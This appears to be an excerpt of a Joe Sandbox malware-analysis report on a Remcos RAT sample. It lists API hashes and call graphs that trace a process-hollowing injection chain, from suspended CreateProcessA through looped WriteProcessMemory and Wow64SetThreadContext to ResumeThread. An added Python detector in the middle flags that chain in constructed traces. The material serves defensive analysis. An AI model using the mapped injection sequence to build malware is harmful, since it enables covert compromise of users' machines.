                                              • Opcode Fuzzy Hash: 30197c67f125b9e880d39ee86cde85e1bd46b3031fecaf570f9ccceffef13c3a
                                              • Instruction Fuzzy Hash: 2E1146B6800349DFDB11DFAAC945BEEBBF5EF48310F14881AE519A7250C779A540CFA0
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000018.00000002.1609015931.00000000074C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074C0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_24_2_74c0000_remcos.jbxd
                                              Similarity
                                              • API ID: ResumeThread
                                              • String ID:
                                              • API String ID: 947044025-0
                                              • Opcode ID: 5ad3363d079098eb46adc690ce5b081defd2376873a62b22365c73868c19cb4c
                                              • Instruction ID: 5d3b846b536e10ec6b5b6ada67d783457c809b677f03a5bc1038a8967915de4d
                                              • Opcode Fuzzy Hash: 5ad3363d079098eb46adc690ce5b081defd2376873a62b22365c73868c19cb4c
                                              • Instruction Fuzzy Hash: 56113AB59003498FDB20DFAAC4457DEFBF5EF48214F14842AD519A7340C7796944CFA5
                                              APIs
                                              • PostMessageW.USER32(?,00000010,00000000,?), ref: 074CB195
                                              Memory Dump Source
                                              • Source File: 00000018.00000002.1609015931.00000000074C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074C0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_24_2_74c0000_remcos.jbxd
                                              Similarity
                                              • API ID: MessagePost
                                              • String ID:
                                              • API String ID: 410705778-0
                                              • Opcode ID: d08c13804c66e1176252fe433580559a3cb31cfc91a5609eebf1aaa49cc4dc9a
                                              • Instruction ID: 6e2c2b9d56881cb628cd848f736e803dd1d87dc81f348a4e451c24a66943da6b
                                              • Opcode Fuzzy Hash: d08c13804c66e1176252fe433580559a3cb31cfc91a5609eebf1aaa49cc4dc9a
                                              • Instruction Fuzzy Hash: 6C11C2B98003499FDB10DF9AD845BDEBBF8EB48314F10885AE558A7740D3B5A944CFA1
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000018.00000002.1609015931.00000000074C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074C0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_24_2_74c0000_remcos.jbxd
                                              Similarity
                                              • API ID: ResumeThread
                                              • String ID:
                                              • API String ID: 947044025-0
                                              • Opcode ID: 7b7ba7c8a780c0cf23a835c74dd8a92a4f519d05cae028b1a4d7437f23389020
                                              • Instruction ID: bbc2c5d6b8a9f0c235257a30cb454d894f70a6e64def1de9754c715302baf3fb
                                              • Opcode Fuzzy Hash: 7b7ba7c8a780c0cf23a835c74dd8a92a4f519d05cae028b1a4d7437f23389020
                                              • Instruction Fuzzy Hash: 1B1155B58003498BDB20CFAAC4457EEFBF4AF48214F24882AD019A7240C779A940CFA0
                                              APIs
                                              • GetModuleHandleW.KERNELBASE(00000000), ref: 015AAF5E
                                              Memory Dump Source
                                              • Source File: 00000018.00000002.1597561858.00000000015A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015A0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_24_2_15a0000_remcos.jbxd
                                              Similarity
                                              • API ID: HandleModule
                                              • String ID:
                                              • API String ID: 4139908857-0
                                              • Opcode ID: cda5fdc6495355545405b8f8e985d3745edbf606466c0fa1298987651d7dbd2d
                                              • Instruction ID: 236462fd2aeb1dd565ddc2f736c9172276722d37305cbf1e6acca8d052b26d5b
                                              • Opcode Fuzzy Hash: cda5fdc6495355545405b8f8e985d3745edbf606466c0fa1298987651d7dbd2d
                                              • Instruction Fuzzy Hash: CB1110B5C002498FDB14CF9AC444BDEFBF8FF88214F10842AD528A7640C379A545CFA1
                                              APIs
                                              • PostMessageW.USER32(?,00000010,00000000,?), ref: 074CB195
                                              Memory Dump Source
                                              • Source File: 00000018.00000002.1609015931.00000000074C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074C0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_24_2_74c0000_remcos.jbxd
                                              Similarity
                                              • API ID: MessagePost
                                              • String ID:
                                              • API String ID: 410705778-0
                                              • Opcode ID: e5e09fcfe5f10687de0f053582eea8593fbd9f7f85e39dc37f80437277141edb
                                              • Instruction ID: 0433ec905967f88a16d82e15c97206e1a1e21485a378e34c3c5d981fdcc8ff22
                                              • Opcode Fuzzy Hash: e5e09fcfe5f10687de0f053582eea8593fbd9f7f85e39dc37f80437277141edb
                                              • Instruction Fuzzy Hash: AF1100B98002499FDB10CF99D985BDEBBF8FB08324F10881AD958B3740C378A544CFA1
                                              Memory Dump Source
                                              • Source File: 00000018.00000002.1597084566.000000000154D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0154D000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_24_2_154d000_remcos.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: eff23fa5fe2dab8683ff97301ab4ab8c4f07479244935b4c58c3fea923ea6372
                                              • Instruction ID: cbb028b6f67a422e07f4e196b7be054ed08c7601720d7e5ac9598f29a4c572f7
                                              • Opcode Fuzzy Hash: eff23fa5fe2dab8683ff97301ab4ab8c4f07479244935b4c58c3fea923ea6372
                                              • Instruction Fuzzy Hash: 1A213671500204DFDB05DF54C9C0B5ABBB5FB94328F24C569E8090F246C37AE456CAA2
                                              Memory Dump Source
                                              • Source File: 00000018.00000002.1597208136.000000000155D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0155D000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_24_2_155d000_remcos.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 1dc2b2629ccfc78eae0506087cef4fcefc84b4ed636f25859999e9f000c32825
                                              • Instruction ID: a3bd965f3587446c62e41a05fa6a72aafe79afad4d3b453a767e5801bdbb11ac
                                              • Opcode Fuzzy Hash: 1dc2b2629ccfc78eae0506087cef4fcefc84b4ed636f25859999e9f000c32825
                                              • Instruction Fuzzy Hash: F72103725043009FDB41DF94C5D0B29BBB5FB84224F24C96EDC094F282C336D446CA61
                                              Memory Dump Source
                                              • Source File: 00000018.00000002.1597208136.000000000155D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0155D000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_24_2_155d000_remcos.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: a9b7212dad9340e94810e6c784a3801cb8c6d1edbdb488e555e1e7456a7eaca2
                                              • Instruction ID: dbfc9609a1c0caa54a9f2ce9bb307dde4d447a6dd6f8d6c0d0ec13b20405cd84
                                              • Opcode Fuzzy Hash: a9b7212dad9340e94810e6c784a3801cb8c6d1edbdb488e555e1e7456a7eaca2
                                              • Instruction Fuzzy Hash: 3721FF72604244DFDB55DF54D8D0B2ABBA5FB84214F24C96ADC0A4F2A2D33AD807CA62
                                              Memory Dump Source
                                              • Source File: 00000018.00000002.1597208136.000000000155D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0155D000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_24_2_155d000_remcos.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: b172d1af8733975c6c27ae6d85e7f785527456ff8cebc946a1f8896bbab84f64
                                              • Instruction ID: 478a1d126a3bd8fa4073379d222b1929bc11a6c0cc06e08e22293dfaacf4e53f
                                              • Opcode Fuzzy Hash: b172d1af8733975c6c27ae6d85e7f785527456ff8cebc946a1f8896bbab84f64
                                              • Instruction Fuzzy Hash: C421B0755083809FCB02CF64D994B15BF71FB46214F28C5EBD8498F2A7D33A9806CB62
                                              Memory Dump Source
                                              • Source File: 00000018.00000002.1597084566.000000000154D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0154D000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_24_2_154d000_remcos.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: f4ddf6aab7a4ec5fdcafc4d9db3305c30ac7726daeb53e4266b93089bec5e780
                                              • Instruction ID: f6c2fde765316ce3f4734eb43c6521aba3d6e77b17c96d1575f85a789d4c04d8
                                              • Opcode Fuzzy Hash: f4ddf6aab7a4ec5fdcafc4d9db3305c30ac7726daeb53e4266b93089bec5e780
                                              • Instruction Fuzzy Hash: 5011CD76404240CFCB02CF54D5C4B5ABF71FB94228F2482A9D8090A656C37AE456CBA1
                                              Memory Dump Source
                                              • Source File: 00000018.00000002.1597208136.000000000155D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0155D000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_24_2_155d000_remcos.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 0571d9b095afed8b546122286ae05565a289416437c47d1601190cbee81fcf2c
                                              • Instruction ID: 81ccb27f733365660cbd7212a8e7716842e032684435dd3908b0412d19d1dbb9
                                              • Opcode Fuzzy Hash: 0571d9b095afed8b546122286ae05565a289416437c47d1601190cbee81fcf2c
                                              • Instruction Fuzzy Hash: 4811BB76504280DFCB42CF54C5D0B19BBB1FB84224F28C6AEDC494F696C33AD44ACB61
                                              Memory Dump Source
                                              • Source File: 00000018.00000002.1597084566.000000000154D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0154D000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_24_2_154d000_remcos.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 5319989ffaeea668343790196ce827b1acb39127fbfab0e46fa5caa6685c8d7e
                                              • Instruction ID: 61d94a763aa925365e189393837e8ed6b7d465280af0118252395d4983d48905
                                              • Opcode Fuzzy Hash: 5319989ffaeea668343790196ce827b1acb39127fbfab0e46fa5caa6685c8d7e
                                              • Instruction Fuzzy Hash: 3201A7311043849BF711CA95CD84B6ABFE8FF51628F18885AED094E287C7799440C672
                                              Memory Dump Source
                                              • Source File: 00000018.00000002.1597084566.000000000154D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0154D000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_24_2_154d000_remcos.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 194cc11a19df8c3ac0cc17d1cf883dbaef469f423736e5663acf7ca7dc0a07df
                                              • Instruction ID: 3a7d98df87e1583cadd12ee341c93ab14252971e0838a45e17e1815f9921305e
                                              • Opcode Fuzzy Hash: 194cc11a19df8c3ac0cc17d1cf883dbaef469f423736e5663acf7ca7dc0a07df
                                              • Instruction Fuzzy Hash: 51F0C2320043849FE7118A4ACD84B66FFA8EF51628F18C45AED080E287C3799844CAB1

                                              Execution Graph

                                              Execution Coverage:11.5%
                                              Dynamic/Decrypted Code Coverage:100%
                                              Signature Coverage:0%
                                              Total number of Nodes:182
                                              Total number of Limit Nodes:6
                                              execution_graph 23113 7218200 23114 7218180 23113->23114 23116 7219c28 12 API calls 23114->23116 23117 7219c38 12 API calls 23114->23117 23118 7219c9e 12 API calls 23114->23118 23115 72182b3 23116->23115 23117->23115 23118->23115 22913 2d3ac10 22917 2d3acf9 22913->22917 22927 2d3ad08 22913->22927 22914 2d3ac1f 22918 2d3ad08 22917->22918 22921 2d3ad3c 22918->22921 22937 2d3a02c 22918->22937 22921->22914 22922 2d3af40 GetModuleHandleW 22924 2d3af6d 22922->22924 22923 2d3ad34 22923->22921 22923->22922 22924->22914 22928 2d3ad19 22927->22928 22932 2d3ad3c 22927->22932 22929 2d3a02c GetModuleHandleW 22928->22929 22930 2d3ad24 22929->22930 22930->22932 22935 2d3af90 GetModuleHandleW 22930->22935 22936 2d3afa0 GetModuleHandleW 22930->22936 22931 2d3ad34 22931->22932 22933 2d3af40 GetModuleHandleW 22931->22933 22932->22914 22934 2d3af6d 22933->22934 22934->22914 22935->22931 22936->22931 22938 2d3aef8 GetModuleHandleW 22937->22938 22940 2d3ad24 22938->22940 22940->22921 22941 2d3afa0 22940->22941 22944 2d3af90 22940->22944 22942 2d3a02c GetModuleHandleW 22941->22942 22943 2d3afb4 22942->22943 22943->22923 22945 2d3afa0 22944->22945 22946 2d3a02c GetModuleHandleW 22945->22946 22947 2d3afb4 22946->22947 22947->22923 23119 2d3cfa0 23120 2d3cfe6 23119->23120 23124 2d3d588 23120->23124 23127 2d3d578 23120->23127 23121 2d3d0d3 23130 2d3d1dc 23124->23130 23128 2d3d5b6 23127->23128 23129 2d3d1dc DuplicateHandle 23127->23129 23128->23121 23129->23128 23131 2d3d5f0 DuplicateHandle 23130->23131 23132 2d3d5b6 23131->23132 23132->23121 22948 7218079 22949 7217edc 22948->22949 22950 721815b 22949->22950 22954 7219c28 22949->22954 22969 7219c9e 22949->22969 22985 7219c38 22949->22985 22955 7219c2c 22954->22955 22957 7219c5a 22955->22957 23000 721a454 22955->23000 23004 721a954 22955->23004 23009 721a355 22955->23009 23014 721a205 22955->23014 23019 721a17e 22955->23019 23023 721a6ff 22955->23023 23028 721a25f 22955->23028 23033 721a2dd 
Call graph (rendered graph data omitted; only the node labels and API edges recoverable from the graph are kept).

Region 07210000 (injector stubs): a dispatcher at 7219c2c / 7219c52 reaches 7219c5a and calls, each reported as "2 API calls", 721a205, 721a355, 721a954, 721a454, 721a0f9, 721a159, 721a398, 721a2bd, 721a2dd, 721a25f, 721a6ff and 721a17e. Leaf chains:
- 721a0f9 -> 721a10c -> 7217ab4 / 7217ac0 -> CreateProcessA (7217b49)
- 721a322 -> 7217770 / 7217778 -> VirtualAllocEx (72177b8)
- 721a159 -> 721a165 -> 7217830 / 7217838 -> WriteProcessMemory (7217880), looping back to 721a165
- 721a2bd -> 721a2c3 -> 7217830 / 7217838 -> WriteProcessMemory
- 721a398 -> 721a2e4 -> 7217921 / 7217928 -> ReadProcessMemory (7217973)
- 721aa89 -> 72176a0 / 7217698 -> Wow64SetThreadContext (72176e5)
- 721a362 and 721a722 -> 72171b3 / 72171b8 -> ResumeThread (72171f8)
- 721aeb8 -> 721aede -> 7214460 -> PostMessageW (721b138)

Region 02D30000: 2d34668 -> 2d34672 / 2d34758 -> 2d3477d -> 2d34858 / 2d34868 -> 2d344b4 -> CreateActCtxA (2d358f8).
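The stubs in the 07210000 region above form the classic RunPE / process-hollowing sequence: a child is created (CreateProcessA), its memory is read and (re)allocated (ReadProcessMemory, VirtualAllocEx), a payload is written in a loop (WriteProcessMemory), the 32-bit thread's context is rewritten (Wow64SetThreadContext, the WOW64 variant of SetThreadContext) and the thread is resumed (ResumeThread). The detector below is an added example, not Joe Sandbox code or anything from the report: it walks an API-call trace and reports a finding when a child created suspended is written to and has its thread context replaced before it is resumed. The trace format, the handle values, the PID and the argument values are constructed for the example; only the caller addresses are taken from the report's call sites.

```python
"""Flag a process-hollowing (RunPE) injection chain in an API-call trace."""
from dataclasses import dataclass, field
from typing import Dict, List

CREATE_SUSPENDED = 0x00000004   # dwCreationFlags bit of CreateProcess
PAGE_EXECUTE_MASK = 0xF0        # PAGE_EXECUTE* protections are 0x10..0x80

# Constructed trace (not from the report). Caller addresses are the report's
# call sites / basic-block addresses; handles, PID and arguments are invented.
CONSTRUCTED_INJECTOR_TRACE = [
    {"api": "CreateProcessA", "caller": 0x07217CF6,
     "args": {"dwCreationFlags": CREATE_SUSPENDED},
     "out": {"hProcess": 0x2C8, "hThread": 0x2CC, "dwProcessId": 4120}},
    {"api": "ReadProcessMemory", "caller": 0x072179A8, "args": {"hProcess": 0x2C8}},
    {"api": "VirtualAllocEx", "caller": 0x072177E6,
     "args": {"hProcess": 0x2C8, "flProtect": 0x40}},   # PAGE_EXECUTE_READWRITE
    {"api": "WriteProcessMemory", "caller": 0x072178C8, "args": {"hProcess": 0x2C8}},
    {"api": "WriteProcessMemory", "caller": 0x072178C8, "args": {"hProcess": 0x2C8}},
    {"api": "WriteProcessMemory", "caller": 0x072178C8, "args": {"hProcess": 0x2C8}},
    {"api": "Wow64SetThreadContext", "caller": 0x0721771E, "args": {"hThread": 0x2CC}},
    {"api": "ResumeThread", "caller": 0x072171F8, "args": {"hThread": 0x2CC}},
]

# Constructed benign launcher: starts a child suspended and resumes it without
# touching its memory or thread context. Must not be flagged.
CONSTRUCTED_LAUNCHER_TRACE = [
    {"api": "CreateProcessW", "caller": 0x00401000,
     "args": {"dwCreationFlags": CREATE_SUSPENDED},
     "out": {"hProcess": 0x300, "hThread": 0x304, "dwProcessId": 5000}},
    {"api": "ResumeThread", "caller": 0x00401040, "args": {"hThread": 0x304}},
]


@dataclass
class SuspendedChild:
    """What the trace has done so far to one child created with CREATE_SUSPENDED."""
    pid: int
    h_process: int
    h_thread: int
    reads: int = 0
    writes: int = 0
    exec_alloc: bool = False
    context_set: bool = False
    wow64: bool = False
    callers: List[int] = field(default_factory=list)


def detect_hollowing(trace: List[dict]) -> List[dict]:
    """Return one finding per suspended child that was written to and had its
    thread context replaced before ResumeThread let it run."""
    by_process: Dict[int, SuspendedChild] = {}
    by_thread: Dict[int, SuspendedChild] = {}
    findings: List[dict] = []

    for call in trace:
        api, args = call["api"], call.get("args", {})

        if api in ("CreateProcessA", "CreateProcessW"):
            if args.get("dwCreationFlags", 0) & CREATE_SUSPENDED:
                out = call["out"]
                child = SuspendedChild(out["dwProcessId"], out["hProcess"], out["hThread"])
                child.callers.append(call["caller"])
                by_process[child.h_process] = child
                by_thread[child.h_thread] = child
            continue

        # Correlate by process handle (memory APIs) or thread handle (context/resume).
        child = by_process.get(args.get("hProcess")) or by_thread.get(args.get("hThread"))
        if child is None:
            continue
        child.callers.append(call["caller"])

        if api == "VirtualAllocEx":
            child.exec_alloc |= bool(args.get("flProtect", 0) & PAGE_EXECUTE_MASK)
        elif api == "WriteProcessMemory":
            child.writes += 1
        elif api == "ReadProcessMemory":
            child.reads += 1
        elif api in ("SetThreadContext", "Wow64SetThreadContext"):
            child.context_set = True
            child.wow64 = api == "Wow64SetThreadContext"
        elif api == "ResumeThread":
            # The chain is complete only if the child was written to AND its entry
            # point was redirected; a plain suspended launch is not reported.
            if child.writes and child.context_set:
                findings.append({
                    "pid": child.pid, "writes": child.writes, "reads": child.reads,
                    "exec_alloc": child.exec_alloc, "wow64": child.wow64,
                    "callers": sorted(set(child.callers)),
                })
            by_process.pop(child.h_process, None)
            by_thread.pop(child.h_thread, None)

    return findings


if __name__ == "__main__":
    for finding in detect_hollowing(CONSTRUCTED_INJECTOR_TRACE):
        print(finding)
```

The write counter matters because the report's graph shows WriteProcessMemory called in a loop (721a165 -> 7217830 -> 721a165), which is how a payload PE is copied section by section; a single write of a few bytes is far less specific. Correlating on the handles returned by CreateProcess rather than on PID keeps the rule from firing on an unrelated process that merely shares the name of the target.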

                                              Control-flow graph of 7217ab4-7217e05 (rendered graph omitted); CreateProcessA is called from basic block 7217c4f-7217d09.
                                              APIs
                                              • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 07217CF6
                                              Memory Dump Source
                                              • Source File: 0000001D.00000002.1699903260.0000000007210000.00000040.00000800.00020000.00000000.sdmp, Offset: 07210000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_29_2_7210000_remcos.jbxd
                                              Similarity
                                              • API ID: CreateProcess
                                              • String ID:
                                              • API String ID: 963392458-0
                                              • Opcode ID: bb8ec83c17cf0b07a7c55baca2d9e4b2457a5ab5d5523766e26aa8e5c1a9d51e
                                              • Instruction ID: 4d4c356fb4782b583fe2c6c5255224fe5cf39032dea78cff4007d67dc2114bf0
                                              • Opcode Fuzzy Hash: bb8ec83c17cf0b07a7c55baca2d9e4b2457a5ab5d5523766e26aa8e5c1a9d51e
                                              • Instruction Fuzzy Hash: 5FA129B1D1035A8FEB24CF68C8417EDBBF2BF99310F148569D809A7280DB759A85CF91

                                              Control-flow graph of 7217ac0-7217e05 (rendered graph omitted); CreateProcessA is called from basic block 7217c4f-7217d09.
                                              APIs
                                              • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 07217CF6
                                              Memory Dump Source
                                              • Source File: 0000001D.00000002.1699903260.0000000007210000.00000040.00000800.00020000.00000000.sdmp, Offset: 07210000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_29_2_7210000_remcos.jbxd
                                              Similarity
                                              • API ID: CreateProcess
                                              • String ID:
                                              • API String ID: 963392458-0
                                              • Opcode ID: bf2fc78d51dce9b8dd4baa8bc3a260dfb68e967fcda627f4431617118466d944
                                              • Instruction ID: 26cc02bc6ff489848f2bdb78cbb8dd7ef3d535d93a50d31886ca2483f6b0efaa
                                              • Opcode Fuzzy Hash: bf2fc78d51dce9b8dd4baa8bc3a260dfb68e967fcda627f4431617118466d944
                                              • Instruction Fuzzy Hash: 919129B1D1021A8FEB24CF68C8417EEBBF2BB99310F148569D809A7240DB759A85CF91

                                              Control-flow graph of 2d3ad08-2d3af88 (rendered graph omitted); GetModuleHandleW is called from basic block 2d3af40-2d3af6b.
                                              Memory Dump Source
                                              • Source File: 0000001D.00000002.1679181318.0000000002D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D30000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_29_2_2d30000_remcos.jbxd
                                              Similarity
                                              • API ID: HandleModule
                                              • String ID:
                                              • API String ID: 4139908857-0
                                              • Opcode ID: d654177ce4310755467279b50343fd4476fef6485cb9daeea255b40741c048b1
                                              • Instruction ID: 035d067e65375413648f5ae6e05ff12bbc2976531ffa52fac1d01927c9837bab
                                              • Opcode Fuzzy Hash: d654177ce4310755467279b50343fd4476fef6485cb9daeea255b40741c048b1
                                              • Instruction Fuzzy Hash: BD712670A00B058FD725DF2AD44479ABBF5FF88204F108A2DE49AD7B50EB75E849CB91

                                              Control-flow graph of 2d358ec-2d35af4 (rendered graph omitted); CreateActCtxA is called from basic block 2d358f8-2d359b9.
                                              APIs
                                              • CreateActCtxA.KERNEL32(?), ref: 02D359A9
                                              Memory Dump Source
                                              • Source File: 0000001D.00000002.1679181318.0000000002D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D30000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_29_2_2d30000_remcos.jbxd
                                              Similarity
                                              • API ID: Create
                                              • String ID:
                                              • API String ID: 2289755597-0
                                              • Opcode ID: ab09a775ff95e36c00fdeceb54ac180af0b0a86ba206c9eea9c95f23dbe14a6e
                                              • Instruction ID: 5594e39818b2ca5c74bc7b2b3fce5af17a8eab40f578b59e0dae85a9824d0858
                                              • Opcode Fuzzy Hash: ab09a775ff95e36c00fdeceb54ac180af0b0a86ba206c9eea9c95f23dbe14a6e
                                              • Instruction Fuzzy Hash: E541CEB0C00719CFDB25DFA9C884BDEBBB5BF89304F60806AD408AB251DB756949CF50

                                              Control-flow graph of 2d344b4-2d35af4 (rendered graph omitted); CreateActCtxA is called from basic block 2d344b4-2d359b9.
                                              APIs
                                              • CreateActCtxA.KERNEL32(?), ref: 02D359A9
                                              Memory Dump Source
                                              • Source File: 0000001D.00000002.1679181318.0000000002D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D30000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_29_2_2d30000_remcos.jbxd
                                              Similarity
                                              • API ID: Create
                                              • String ID:
                                              • API String ID: 2289755597-0
                                              • Opcode ID: 65359e0ecc3d8fcd0667e4205609993d7c5399cd16f750cf2d17f288e8f5d3fb
                                              • Instruction ID: 9fab259f678ac3929748152c5e896bc99901c3ccaeeccfe9dc1ad86055bb7979
                                              • Opcode Fuzzy Hash: 65359e0ecc3d8fcd0667e4205609993d7c5399cd16f750cf2d17f288e8f5d3fb
                                              • Instruction Fuzzy Hash: 6D41DFB0C04719CBDB25DFA9C884BDEBBF5BF49304F60806AD408AB251DB756949CF90

                                              Control-flow graph of 7217830-721790e (rendered graph omitted); WriteProcessMemory is called from basic block 7217896-72178d5.
                                              APIs
                                              • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 072178C8
                                              Memory Dump Source
                                              • Source File: 0000001D.00000002.1699903260.0000000007210000.00000040.00000800.00020000.00000000.sdmp, Offset: 07210000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_29_2_7210000_remcos.jbxd
                                              Similarity
                                              • API ID: MemoryProcessWrite
                                              • String ID:
                                              • API String ID: 3559483778-0
                                              • Opcode ID: a3edc9204152ec99807b8e79f7d1faebf6424a012664ca064ef89f27ea175d31
                                              • Instruction ID: 7cd24f0444c7ad65a084c80ab716af2d9cc4857a3424aefed9d17538bc51a712
                                              • Opcode Fuzzy Hash: a3edc9204152ec99807b8e79f7d1faebf6424a012664ca064ef89f27ea175d31
                                              • Instruction Fuzzy Hash: F82126B69003099FDB00CFA9C9857EEBBF1FF48310F14842AE558A7240D7789A55CBA0

                                              Control-flow graph of 7217838-721790e (rendered graph omitted); WriteProcessMemory is called from basic block 7217896-72178d5.
                                              APIs
                                              • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 072178C8
                                              Memory Dump Source
                                              • Source File: 0000001D.00000002.1699903260.0000000007210000.00000040.00000800.00020000.00000000.sdmp, Offset: 07210000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_29_2_7210000_remcos.jbxd
                                              Similarity
                                              • API ID: MemoryProcessWrite
                                              • String ID:
                                              • API String ID: 3559483778-0
                                              • Opcode ID: c8963915825caffece62279d499a8fb80705ef3d9ff7443afc8e0197eaa35d4f
                                              • Instruction ID: e75b7c97aec5df3fda364bd460e84fa67cb5599bd13ec9254858bdf3aa07e37d
                                              • Opcode Fuzzy Hash: c8963915825caffece62279d499a8fb80705ef3d9ff7443afc8e0197eaa35d4f
                                              • Instruction Fuzzy Hash: 262139B591030A9FDB10CFA9C885BEEBBF5FF48310F14842AE958A7340D7799954CBA1

                                              Control-flow graph of 7217698-7217764 (rendered graph omitted); Wow64SetThreadContext is called from basic block 72176fb-721772b.
                                              APIs
                                              • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0721771E
                                              Memory Dump Source
                                              • Source File: 0000001D.00000002.1699903260.0000000007210000.00000040.00000800.00020000.00000000.sdmp, Offset: 07210000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_29_2_7210000_remcos.jbxd
                                              Similarity
                                              • API ID: ContextThreadWow64
                                              • String ID:
                                              • API String ID: 983334009-0
                                              • Opcode ID: 2d1673c87ef0bf323453db057e91a2f94ece3212ad0de18e03e2c8460d35a3ad
                                              • Instruction ID: fefac6f94873b10a8337f318670ea2fe1fbd3e2a0f96c5d6e1e86b2fbaf6b1a6
                                              • Opcode Fuzzy Hash: 2d1673c87ef0bf323453db057e91a2f94ece3212ad0de18e03e2c8460d35a3ad
                                              • Instruction Fuzzy Hash: 0C2157B69003098FDB10CFA9C4857EEBBF0FF88210F14842AD459A7240CB789A45CFA1

                                              Control-flow graph of 2d3d1dc-2d3d6aa (rendered graph omitted); DuplicateHandle is called from basic block 2d3d1dc-2d3d684.
                                              APIs
                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,02D3D5B6,?,?,?,?,?), ref: 02D3D677
                                              Memory Dump Source
                                              • Source File: 0000001D.00000002.1679181318.0000000002D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D30000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_29_2_2d30000_remcos.jbxd
                                              Similarity
                                              • API ID: DuplicateHandle
                                              • String ID:
                                              • API String ID: 3793708945-0
                                              • Opcode ID: 5ee8e6e3c227e8371c486cea163a4493ff9d5cd4975c2d3bd034ead2d2156138
                                              • Instruction ID: 2fc1b824aabb9bf02107bc30c2e7bdd890485717e2cc63764b77205ff39d9964
                                              • Opcode Fuzzy Hash: 5ee8e6e3c227e8371c486cea163a4493ff9d5cd4975c2d3bd034ead2d2156138
                                              • Instruction Fuzzy Hash: DC2114B590024DDFDB10CF9AD884AEEBBF9FB48310F14801AE918A3350D374A950CFA4

                                              Control-flow graph of 2d3d5e8-2d3d6aa (rendered graph omitted); DuplicateHandle is called from basic block 2d3d5f0-2d3d684.
                                              APIs
                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,02D3D5B6,?,?,?,?,?), ref: 02D3D677
                                              Memory Dump Source
                                              • Source File: 0000001D.00000002.1679181318.0000000002D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D30000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_29_2_2d30000_remcos.jbxd
                                              Similarity
                                              • API ID: DuplicateHandle
                                              • String ID:
                                              • API String ID: 3793708945-0
                                              • Opcode ID: d54dc21ce086437ac0bf61ca37ff2c88b2ffcc7b710ca41565cdd9789f15be5b
                                              • Instruction ID: 7cc76f6e2a25cee44521fdbbe22101588afc7464f2dcdc10a5be335377d9fa84
                                              • Opcode Fuzzy Hash: d54dc21ce086437ac0bf61ca37ff2c88b2ffcc7b710ca41565cdd9789f15be5b
                                              • Instruction Fuzzy Hash: 8D2114B59002499FDB10CFAAD984ADEBBF5FB48310F14801AE958A3350D378A940CF64

